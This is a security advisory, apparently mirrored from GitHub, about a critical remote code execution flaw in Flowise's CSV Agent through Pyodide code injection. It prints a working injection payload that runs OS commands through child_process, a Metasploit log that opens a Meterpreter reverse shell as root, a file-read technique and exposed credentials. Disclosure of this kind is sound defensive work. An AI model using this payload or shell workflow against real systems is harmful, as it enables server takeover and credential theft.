GHSA-vmv7-4m6c-3cg5: Flowise: CSV Agent Remote Code Execution via Pyodide Code Injection — Root Shell Verified
UPDATE 2026-05-20: Full RCE as root VERIFIED
This is not theoretical — a Meterpreter reverse shell session as root has been established on Flowise 3.1.2.
Verified Exploit Chain
1. Python code injection via base64_string = "${base64String}" (CSVAgent.ts line 161)
2. Pyodide js bridge provides access to the host Node.js process
3. process.mainModule.constructor._load('child_process') loads child_process (bypasses ESM require restriction)
4. .execSync('CMD') executes arbitrary OS commands as root (PID 1 in container)
Working RCE Payload
";import js;e=js.globalThis.eval;e("process.mainModule.constructor._load('child_process').execSync('id')");#
Constraint: No commas allowed in payload — csvFile.split(',') splits on all commas.
Metasploit Session Proof
msf > use exploit/multi/http/flowise_csv_agent_rce
msf > set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
msf > exploit
[+] Authentication successful
[+] Created chatflow: b6716feb-63c8-4fd2-993f-cd43788704b4
[*] Sending stage (3090404 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:41422)
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : cbce3fb352b7
OS : Linux 6.8.0-111-generic
Architecture : x64
Meterpreter : x64/linux
meterpreter > shell
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
uname -a
Linux cbce3fb352b7 6.8.0-111-generic x86_64 Linux
Additional Verified Impact
Credential Theft:
FLOWISE_PASSWORD=admin123
DATABASE_PATH=/root/.flowise
APIKEY_PATH=...
Arbitrary File Read via process.binding('fs').readFileUtf8('/etc/hostname') → cbce3fb352b7
Server DoS — certain native binding calls (spawn_sync) crash the Node.js process entirely.
CVSS v3.1: 9.9 CRITICAL
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Original Report (below)
Vulnerable Code
File: packages/components/nodes/agents/CSVAgent/CSVAgent.ts
Lines 133-138 — Unsanitized string extraction from data URI via file.split(',').pop().pop() — no validation on co
Details
Original advisory: https://github.com/advisories/GHSA-vmv7-4m6c-3cg5
Referenced CVEs
| CVE | CSIRTS overview | External |
|---|---|---|
| CVE-2026-69255 | coverage & exploitation status | NVD · CVE.org |
Same CVEs, other sources
How other CERTs, PSIRTs and databases cover the vulnerabilities in this advisory.
More from GitHub Security Advisories
- mediumGHSA-xm43-3m56-w3wf: Ghost: Paid gift memberships obtainable at minimal cost via the donations feature2026-08-04
- mediumGHSA-chgm-3698-jm42: Ghost: Member existence leak via magic link sign-in response2026-08-04
- highGHSA-xpp7-93x6-v29m: XSS in Ghost's ActivityPub client2026-08-04
- mediumGHSA-7mpp-r37j-x5wh: Ghost: Session Fixation in Ghost Admin2026-08-04
- mediumGHSA-cjc9-q5gf-327p: Ghost: Theme Upload Path Traversal2026-08-04